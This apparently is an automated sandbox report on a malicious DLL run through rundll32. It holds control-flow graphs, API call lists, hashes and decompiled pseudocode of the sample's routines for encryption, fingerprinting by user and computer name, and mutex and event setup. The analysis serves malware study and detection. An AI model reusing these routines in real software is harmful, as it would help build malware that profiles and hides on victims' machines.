                            control_flow_graph 43 4f700dc-4f70125 RtlInitializeCriticalSection call 4f69394 46 4f70127-4f7014b memset RtlInitializeCriticalSection 43->46 47 4f7014d-4f7014f 43->47 48 4f70150-4f70156 46->48 47->48 49 4f7015c-4f70180 CreateMutexA GetLastError 48->49 50 4f70558-4f70562 48->50 51 4f70182-4f70187 49->51 52 4f7019d-4f7019f 49->52 53 4f7019b 51->53 54 4f70189-4f70196 CloseHandle 51->54 55 4f701a5-4f701b0 call 4f75261 52->55 56 4f70553 52->56 53->52 54->56 58 4f70557 55->58 60 4f701b6-4f701c1 call 4f78452 55->60 56->58 58->50 60->58 63 4f701c7-4f701d9 GetUserNameA 60->63 64 4f701fd-4f7020d 63->64 65 4f701db-4f701f3 RtlAllocateHeap 63->65 67 4f70216-4f70233 NtQueryInformationProcess 64->67 68 4f7020f-4f70214 64->68 65->64 66 4f701f5-4f701fb GetUserNameA 65->66 66->64 70 4f70235 67->70 71 4f70239-4f70248 OpenProcess 67->71 68->67 69 4f7025d-4f70267 68->69 74 4f702a4-4f702a8 69->74 75 4f70269-4f70285 GetShellWindow GetWindowThreadProcessId 69->75 70->71 72 4f70256-4f70257 CloseHandle 71->72 73 4f7024a-4f7024f GetLastError 71->73 72->69 73->69 76 4f70251 73->76 79 4f702bd-4f702d4 call 4f6f01f 74->79 80 4f702aa-4f702ba memcpy 74->80 77 4f70297-4f7029e 75->77 78 4f70287-4f7028d 75->78 81 4f702ed-4f70329 call 4f79370 call 4f76c1e call 4f8087a 76->81 77->74 83 4f702a0 77->83 78->77 82 4f7028f-4f70295 78->82 88 4f702d6-4f702da 79->88 89 4f702e1-4f702e7 79->89 80->79 96 4f7033f-4f7034e call 4f6e1b1 81->96 97 4f7032b-4f7033a CreateEventA call 4f7e803 81->97 82->74 83->74 88->89 90 4f702dc call 4f818c0 88->90 89->58 89->81 90->89 96->58 101 4f70354-4f70367 RtlAllocateHeap 96->101 97->96 101->58 102 4f7036d-4f7038d OpenEventA 101->102 103 4f703af-4f703b1 102->103 104 4f7038f-4f7039e CreateEventA 102->104 105 4f703b2-4f703d9 call 4f773aa 103->105 104->105 106 4f703a0-4f703aa GetLastError 104->106 109 4f70546-4f7054d 105->109 110 4f703df-4f703ed 105->110 106->58 109->58 111 4f703f3-4f7040b call 4f7b6d6 110->111 112 4f7049f-4f704a5 110->112 111->58 130 4f70411-4f70418 111->130 113 4f704a7-4f704ac call 4f8157a call 4f6708f 112->113 114 4f704b1-4f704b8 112->114 113->114 114->56 117 4f704be-4f704c3 114->117 118 4f704c5-4f704cb 117->118 119 4f7051f-4f70544 call 4f773aa 117->119 122 4f704cd-4f704d4 SetEvent 118->122 123 4f704da-4f704f0 RtlAllocateHeap 118->123 119->109 131 4f7054f-4f70550 119->131 122->123 127 4f704f2-4f70519 wsprintfA 123->127 128 4f7051c-4f7051e 123->128 127->128 128->119 132 4f7042c-4f70440 LoadLibraryA 130->132 133 4f7041a-4f70426 130->133 131->56 134 4f70442-4f7046a call 4f7e778 132->134 135 4f7046f-4f70482 call 4f781f1 132->135 133->132 134->135 135->58 139 4f70488-4f70491 135->139 139->114 140 4f70493-4f7049d call 4f688fa 139->140 140->114
                            APIs
                            • RtlInitializeCriticalSection.NTDLL(04F8A428), ref: 04F700FA
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            • memset.NTDLL ref: 04F7012B
                            • RtlInitializeCriticalSection.NTDLL(0631C2D0), ref: 04F7013C
                              • Part of subcall function 04F75261: RtlInitializeCriticalSection.NTDLL(04F8A400), ref: 04F75285
                              • Part of subcall function 04F75261: RtlInitializeCriticalSection.NTDLL(04F8A3E0), ref: 04F7529B
                              • Part of subcall function 04F75261: GetVersion.KERNEL32(?,?,?,?,?,?,?,04F69100,?,?,?,?,?), ref: 04F752AC
                              • Part of subcall function 04F75261: GetModuleHandleA.KERNEL32(00001683,?,?,?,?,?,?,?,04F69100,?,?,?,?,?), ref: 04F752E0
                              • Part of subcall function 04F78452: RtlAllocateHeap.NTDLL(00000000,-00000003,774B9EB0), ref: 04F7846C
                            • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000060,?,?,?,?,?,?,?,04F69100,?), ref: 04F70165
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,04F69100,?,?,?,?,?), ref: 04F70176
                            • CloseHandle.KERNEL32(000005C8,?,?,?,?,?,?,?,04F69100,?,?,?,?,?), ref: 04F7018A
                            • GetUserNameA.ADVAPI32(00000000,?), ref: 04F701D3
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04F701E6
                            • GetUserNameA.ADVAPI32(00000000,?), ref: 04F701FB
                            • NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 04F7022B
                            • OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,?,?,04F69100,?,?,?,?,?), ref: 04F70240
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,04F69100,?,?,?,?,?), ref: 04F7024A
                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,04F69100,?,?,?,?,?), ref: 04F70257
                            • GetShellWindow.USER32 ref: 04F70272
                            • GetWindowThreadProcessId.USER32(00000000), ref: 04F70279
                            • memcpy.NTDLL(04F8A2F4,?,00000018,?,?,?,?,?,?,?,04F69100,?,?,?,?,?), ref: 04F702B5
                            • CreateEventA.KERNEL32(04F8A1E8,00000001,00000000,00000000,?,00000001,?,?,?,?,?,?,?,04F69100,?), ref: 04F70333
                            • RtlAllocateHeap.NTDLL(00000000,00000018,?), ref: 04F7035D
                            • OpenEventA.KERNEL32(00100000,00000000,0631B9C8,?,?,?,?,?,?,?,04F69100,?,?,?,?,?), ref: 04F70385
                            • CreateEventA.KERNEL32(04F8A1E8,00000001,00000000,0631B9C8,?,?,?,?,?,?,?,04F69100,?), ref: 04F7039A
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,04F69100,?,?,?,?,?), ref: 04F703A0
                            • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,04F69100,?,?,?,?,?), ref: 04F70438
                            • SetEvent.KERNEL32(?,04F7C384,00000000,00000000,?,?,?,?,?,?,?,04F69100,?), ref: 04F704CE
                            • RtlAllocateHeap.NTDLL(00000000,00000043,04F7C384), ref: 04F704E3
                            • wsprintfA.USER32 ref: 04F70513
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeap$CriticalEventInitializeSection$CreateErrorHandleLastProcess$CloseNameOpenUserWindow$InformationLibraryLoadModuleMutexQueryShellThreadVersionmemcpymemsetwsprintf
                            • String ID:
                            • API String ID: 3929413950-0
                            • Opcode ID: edb7c52d7a60bc854ba3f0ccd374ac8ccf779e63bc84937524d2b9aabbee3e8e
                            • Instruction ID: 278c2db538fc033ccbfeed652707175e875030bd9771062f0a47a701fc0e73c0
                            • Opcode Fuzzy Hash: edb7c52d7a60bc854ba3f0ccd374ac8ccf779e63bc84937524d2b9aabbee3e8e
                            • Instruction Fuzzy Hash: 17C15AB5A00648AFD720EF65F88893A7BE8EB85704B14481FE546DB210DB7DB846CF61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A15FBB Relevance: 19.7, APIs: 13, Instructions: 163encryptionCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 189 4a15fbb-4a15ffb CryptAcquireContextW 190 4a16001-4a1603d memcpy CryptImportKey 189->190 191 4a16152-4a16158 GetLastError 189->191 193 4a16043-4a16055 CryptSetKeyParam 190->193 194 4a1613d-4a16143 GetLastError 190->194 192 4a1615b-4a16162 191->192 196 4a16129-4a1612f GetLastError 193->196 197 4a1605b-4a16064 193->197 195 4a16146-4a16150 CryptReleaseContext 194->195 195->192 200 4a16132-4a1613b CryptDestroyKey 196->200 198 4a16066-4a16068 197->198 199 4a1606c-4a16079 call 4a16d63 197->199 198->199 201 4a1606a 198->201 204 4a16120-4a16127 199->204 205 4a1607f-4a16088 199->205 200->195 201->199 204->200 206 4a1608b-4a16093 205->206 207 4a16095 206->207 208 4a16098-4a160b5 memcpy 206->208 207->208 209 4a160d0-4a160df CryptDecrypt 208->209 210 4a160b7-4a160ce CryptEncrypt 208->210 211 4a160e5-4a160e7 209->211 210->211 212 4a160f7-4a16102 GetLastError 211->212 213 4a160e9-4a160f3 211->213 215 4a16104-4a16114 212->215 216 4a16116-4a1611e call 4a16c2c 212->216 213->206 214 4a160f5 213->214 214->215 215->200 216->200
                            C-Code - Quality: 58%
                            			E04A15FBB(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				int _v8;
				long* _v12;
				int _v16;
				BYTE* _v20;
				long* _v24;
				void* _v39;
				char _v40;
				void _v56;
				int _v60;
				intOrPtr _v64;
				void _v67;
				char _v68;
				void* _t61;
				int _t68;
				signed int _t76;
				int _t79;
				int _t81;
				int _t85;
				long _t86;
				int _t90;
				signed int _t94;
				int _t101;
				BYTE* _t102;
				int _t103;
				void* _t104;
				void* _t105;
				void* _t106;

				_t103 = __eax;
				_t94 = 6;
				_v68 = 0;
				memset( &_v67, 0, _t94 << 2);
				_t105 = _t104 + 0xc;
				asm("stosw");
				asm("stosb");
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				asm("stosb");
				_t61 =  *0x4a1a0e8( &_v24, 0, 0, 0x18, 0xf0000000); // executed
				if(_t61 == 0) {
					_a8 = GetLastError();
				} else {
					_t101 = 0x10;
					memcpy( &_v56, _a8, _t101);
					_t106 = _t105 + 0xc;
					_v60 = _t101;
					_v67 = 2;
					_v64 = 0x660e;
					_v68 = 8;
					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
					if(_t68 == 0) {
						_a8 = GetLastError();
					} else {
						_push(0);
						_push( &_v40);
						_push(1);
						_push(_v12);
						if( *0x4a1a0e4() == 0) {
							_a8 = GetLastError();
						} else {
							_t18 = _t103 + 0xf; // 0x10
							_t76 = _t18 & 0xfffffff0;
							if(_a4 != 0 && _t76 == _t103) {
								_t76 = _t76 + _t101;
							}
							_t102 = E04A16D63(_t76);
							_v20 = _t102;
							if(_t102 == 0) {
								_a8 = 8;
							} else {
								_v16 = 0;
								_a8 = 0;
								while(1) {
									_t79 = 0x10;
									_v8 = _t79;
									if(_t103 <= _t79) {
										_v8 = _t103;
									}
									memcpy(_t102, _a12, _v8);
									_t81 = _v8;
									_a12 = _a12 + _t81;
									_t103 = _t103 - _t81;
									_t106 = _t106 + 0xc;
									if(_a4 == 0) {
										_t85 = CryptDecrypt(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
									} else {
										_t85 =  *0x4a1a0c0(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
									}
									if(_t85 == 0) {
										break;
									}
									_t90 = _v8;
									_v16 = _v16 + _t90;
									_t102 =  &(_t102[_t90]);
									if(_t103 != 0) {
										continue;
									} else {
										L17:
										 *_a16 = _v20;
										 *_a20 = _v16;
									}
									goto L21;
								}
								_t86 = GetLastError();
								_a8 = _t86;
								if(_t86 != 0) {
									E04A16C2C(_v20);
								} else {
									goto L17;
								}
							}
						}
						L21:
						CryptDestroyKey(_v12);
					}
					CryptReleaseContext(_v24, 0);
				}
				return _a8;
			}






























                            0x04a15fc4
                            0x04a15fca
                            0x04a15fcd
                            0x04a15fd3
                            0x04a15fd3
                            0x04a15fd5
                            0x04a15fd7
                            0x04a15fda
                            0x04a15fe0
                            0x04a15fe1
                            0x04a15fe2
                            0x04a15fe8
                            0x04a15fed
                            0x04a15ff3
                            0x04a15ffb
                            0x04a16158
                            0x04a16001
                            0x04a16003
                            0x04a1600c
                            0x04a16011
                            0x04a16023
                            0x04a16026
                            0x04a1602a
                            0x04a16031
                            0x04a16035
                            0x04a1603d
                            0x04a16143
                            0x04a16043
                            0x04a16043
                            0x04a16047
                            0x04a16048
                            0x04a1604a
                            0x04a16055
                            0x04a1612f
                            0x04a1605b
                            0x04a1605b
                            0x04a1605e
                            0x04a16064
                            0x04a1606a
                            0x04a1606a
                            0x04a16072
                            0x04a16074
                            0x04a16079
                            0x04a16120
                            0x04a1607f
                            0x04a16085
                            0x04a16088
                            0x04a1608b
                            0x04a1608d
                            0x04a1608e
                            0x04a16093
                            0x04a16095
                            0x04a16095
                            0x04a1609f
                            0x04a160a4
                            0x04a160a7
                            0x04a160aa
                            0x04a160ac
                            0x04a160b5
                            0x04a160df
                            0x04a160b7
                            0x04a160c8
                            0x04a160c8
                            0x04a160e7
                            0x00000000
                            0x00000000
                            0x04a160e9
                            0x04a160ec
                            0x04a160ef
                            0x04a160f3
                            0x00000000
                            0x04a160f5
                            0x04a16104
                            0x04a1610a
                            0x04a16112
                            0x04a16112
                            0x00000000
                            0x04a160f3
                            0x04a160f7
                            0x04a160fd
                            0x04a16102
                            0x04a16119
                            0x00000000
                            0x00000000
                            0x00000000
                            0x04a16102
                            0x04a16079
                            0x04a16132
                            0x04a16135
                            0x04a16135
                            0x04a1614a
                            0x04a1614a
                            0x04a16162

                            APIs
                            • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,04A124D8,00000001,04A158D7,00000000), ref: 04A15FF3
                            • memcpy.NTDLL(04A124D8,04A158D7,00000010,?,?,?,04A124D8,00000001,04A158D7,00000000,?,04A11D97,00000000,04A158D7,?,746BC740), ref: 04A1600C
                            • CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 04A16035
                            • CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 04A1604D
                            • memcpy.NTDLL(00000000,746BC740,055395B0,00000010), ref: 04A1609F
                            • CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,055395B0,00000020,?,?,00000010), ref: 04A160C8
                            • CryptDecrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,055395B0,?,?,00000010), ref: 04A160DF
                            • GetLastError.KERNEL32(?,?,00000010), ref: 04A160F7
                            • GetLastError.KERNEL32 ref: 04A16129
                            • CryptDestroyKey.ADVAPI32(00000000), ref: 04A16135
                            • GetLastError.KERNEL32 ref: 04A1613D
                            • CryptReleaseContext.ADVAPI32(?,00000000), ref: 04A1614A
                            • GetLastError.KERNEL32(?,?,?,04A124D8,00000001,04A158D7,00000000,?,04A11D97,00000000,04A158D7,?,746BC740,04A158D7,00000000,055395B0), ref: 04A16152
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDecryptDestroyEncryptImportParamRelease
                            • String ID:
                            • API String ID: 1967744295-0
                            • Opcode ID: 81dc3523e4ec4ae55ae517fe5790a2506838bdb125b4f3434960bc9e5ff1305d
                            • Instruction ID: 883345a2dfd7dc623f7428777ab21aae15396e5850ca0021381fb4465bfde6dc
                            • Opcode Fuzzy Hash: 81dc3523e4ec4ae55ae517fe5790a2506838bdb125b4f3434960bc9e5ff1305d
                            • Instruction Fuzzy Hash: F75109B1901209FFEB10DFA4DC84AAEBBB9FB04350F048429F905E7260D775AE15DB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A176BB Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            C-Code - Quality: 74%
                            			E04A176BB(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L04A18244();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x4a1a348; // 0xb1d5a8
				_t5 = _t13 + 0x4a1b87a; // 0x5538e22
				_t6 = _t13 + 0x4a1b594; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L04A17EAA();
				_t17 = CreateFileMappingW(0xffffffff, 0x4a1a34c, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}













                            0x04a176bb
                            0x04a176c3
                            0x04a176c7
                            0x04a176cd
                            0x04a176d2
                            0x04a176d7
                            0x04a176da
                            0x04a176dd
                            0x04a176e2
                            0x04a176e3
                            0x04a176e6
                            0x04a176eb
                            0x04a176f2
                            0x04a176fc
                            0x04a176fe
                            0x04a176ff
                            0x04a17702
                            0x04a1771e
                            0x04a17724
                            0x04a17728
                            0x04a17776
                            0x04a1772a
                            0x04a17737
                            0x04a17747
                            0x04a1774f
                            0x04a17761
                            0x04a17765
                            0x00000000
                            0x00000000
                            0x04a17751
                            0x04a17754
                            0x04a17759
                            0x04a1775b
                            0x04a1775b
                            0x04a17739
                            0x04a1773b
                            0x04a17767
                            0x04a17768
                            0x04a17768
                            0x04a17737
                            0x04a1777d

                            APIs
                            • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,04A13DBA,?,?,4D283A53,?,?), ref: 04A176C7
                            • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 04A176DD
                            • _snwprintf.NTDLL ref: 04A17702
                            • CreateFileMappingW.KERNELBASE(000000FF,04A1A34C,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 04A1771E
                            • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,04A13DBA,?,?,4D283A53,?), ref: 04A17730
                            • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 04A17747
                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,04A13DBA,?,?,4D283A53), ref: 04A17768
                            • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,04A13DBA,?,?,4D283A53,?), ref: 04A17770
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                            • String ID:
                            • API String ID: 1814172918-0
                            • Opcode ID: db65388d9e75b1968437f57320d44f09c83ca0143d3c2fa5c7336ad15aafba57
                            • Instruction ID: 846621a3b1afaf5388ed2bf7265dc68522704b9e62bd31fd6d8e1373825c40f7
                            • Opcode Fuzzy Hash: db65388d9e75b1968437f57320d44f09c83ca0143d3c2fa5c7336ad15aafba57
                            • Instruction Fuzzy Hash: 9621A5BA640204BBE711EB64DC45F9E77BEEB58750F240021F509E71A0E670A905CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A13365 Relevance: 12.1, APIs: 8, Instructions: 103memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 353 4a13365-4a13379 354 4a13383-4a13395 call 4a12119 353->354 355 4a1337b-4a13380 353->355 358 4a13397-4a133a7 GetUserNameW 354->358 359 4a133e9-4a133f6 354->359 355->354 360 4a133a9-4a133b9 RtlAllocateHeap 358->360 361 4a133f8-4a1340f GetComputerNameW 358->361 359->361 360->361 362 4a133bb-4a133c8 GetUserNameW 360->362 363 4a13411-4a13422 RtlAllocateHeap 361->363 364 4a1344d-4a13471 361->364 365 4a133d8-4a133e7 HeapFree 362->365 366 4a133ca-4a133d6 call 4a1708d 362->366 363->364 367 4a13424-4a1342d GetComputerNameW 363->367 365->361 366->365 369 4a1342f-4a1343b call 4a1708d 367->369 370 4a1343e-4a13447 HeapFree 367->370 369->370 370->364
                            C-Code - Quality: 96%
                            			E04A13365(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x4a1a310; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E04A12119( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x4a1a344 ^ 0x46d76429;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x4a1a2d8, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E04A1708D(_v8 + _v8, _t64);
							}
							HeapFree( *0x4a1a2d8, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x4a1a2d8, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E04A1708D(_v8 + _v8, _t64);
						}
						HeapFree( *0x4a1a2d8, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}



















                            0x04a13365
                            0x04a1336d
                            0x04a13371
                            0x04a13374
                            0x04a13379
                            0x04a1337b
                            0x04a13380
                            0x04a13380
                            0x04a13386
                            0x04a13388
                            0x04a13395
                            0x04a133f6
                            0x04a13397
                            0x04a1339c
                            0x04a133a2
                            0x04a133a7
                            0x04a133b5
                            0x04a133b9
                            0x04a133c8
                            0x04a133cf
                            0x04a133d6
                            0x04a133d6
                            0x04a133e1
                            0x04a133e1
                            0x04a133b9
                            0x04a133a7
                            0x04a133f8
                            0x04a133fe
                            0x04a13408
                            0x04a1340a
                            0x04a1340f
                            0x04a1341e
                            0x04a13422
                            0x04a1342d
                            0x04a13434
                            0x04a1343b
                            0x04a1343b
                            0x04a13447
                            0x04a13447
                            0x04a13422
                            0x04a13452
                            0x04a13454
                            0x04a13457
                            0x04a13459
                            0x04a1345c
                            0x04a1345f
                            0x04a13469
                            0x04a1346d
                            0x04a13471

                            APIs
                            • GetUserNameW.ADVAPI32(00000000,?), ref: 04A1339C
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04A133B3
                            • GetUserNameW.ADVAPI32(00000000,?), ref: 04A133C0
                            • HeapFree.KERNEL32(00000000,00000000), ref: 04A133E1
                            • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04A13408
                            • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04A1341C
                            • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04A13429
                            • HeapFree.KERNEL32(00000000,00000000), ref: 04A13447
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: HeapName$AllocateComputerFreeUser
                            • String ID:
                            • API String ID: 3239747167-0
                            • Opcode ID: 130571ef74958f84946989d421c75b9cf1f562023c6ad3db6136c7947d2574f2
                            • Instruction ID: aa32277cd8b71f78577a21b902b87b0e82a3fe2fa5a059b80c1b46fd1c83c52e
                            • Opcode Fuzzy Hash: 130571ef74958f84946989d421c75b9cf1f562023c6ad3db6136c7947d2574f2
                            • Instruction Fuzzy Hash: 53311B71A00205EFEB11DFA9DD81AAEB7F9EB58310F514469E905D7220DB74EE42DB10
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F68FEC Relevance: 10.6, APIs: 7, Instructions: 113stringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 477 4f68fec-4f68ffe 478 4f69000-4f69006 477->478 479 4f69008 477->479 480 4f6900e-4f69022 call 4f77ac9 478->480 479->480 483 4f69024-4f69032 StrRChrA 480->483 484 4f6905e-4f69088 call 4f6c431 480->484 485 4f69037 483->485 486 4f69034-4f69035 483->486 491 4f690a6-4f690ae 484->491 492 4f6908a-4f6908e 484->492 488 4f6903d-4f69058 _strupr lstrlen call 4f80ee0 485->488 486->488 488->484 495 4f690b5-4f690d3 CreateEventA 491->495 496 4f690b0-4f690b3 491->496 492->491 494 4f69090-4f6909b 492->494 494->491 497 4f6909d-4f690a4 494->497 499 4f69107-4f6910d GetLastError 495->499 500 4f690d5-4f690dc call 4f75e8d 495->500 498 4f69113-4f6911a 496->498 497->491 497->497 503 4f6911c-4f69123 RtlRemoveVectoredExceptionHandler 498->503 504 4f69129-4f6912e 498->504 502 4f6910f-4f69111 499->502 500->499 506 4f690de-4f690e5 500->506 502->498 502->504 503->504 507 4f690e7-4f690f3 RtlAddVectoredExceptionHandler 506->507 508 4f690f8-4f690fb call 4f700dc 506->508 507->508 510 4f69100-4f69105 508->510 510->499 510->502
                            APIs
                            • StrRChrA.SHLWAPI(0631B5B0,00000000,0000005C,?,?,?), ref: 04F69028
                            • _strupr.NTDLL ref: 04F6903E
                            • lstrlen.KERNEL32(0631B5B0,?,?), ref: 04F69046
                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?), ref: 04F690C6
                            • RtlAddVectoredExceptionHandler.NTDLL(00000000,04F8076B), ref: 04F690ED
                            • GetLastError.KERNEL32(?,?,?,?), ref: 04F69107
                            • RtlRemoveVectoredExceptionHandler.NTDLL(04FC05B8), ref: 04F6911D
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExceptionHandlerVectored$CreateErrorEventLastRemove_struprlstrlen
                            • String ID:
                            • API String ID: 2251957091-0
                            • Opcode ID: 23bb3fe2763f1ad6ea9286b4f49c57f265eb060be4c2b8a576b36b7696015594
                            • Instruction ID: b50069d510c7cf640453a346c062385a9179e87f2943b1756467b2d8380b1832
                            • Opcode Fuzzy Hash: 23bb3fe2763f1ad6ea9286b4f49c57f265eb060be4c2b8a576b36b7696015594
                            • Instruction Fuzzy Hash: DA3186B2D00519AFEB11AFB4BC88D7E77A4E704354B15042FE613DB140E679AC468F91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F6C431 Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                            Download Yara Rule
                            APIs
                            • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 04F6C478
                            • NtOpenProcessToken.NTDLL(?,00000008,?), ref: 04F6C48B
                            • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,?), ref: 04F6C4A7
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
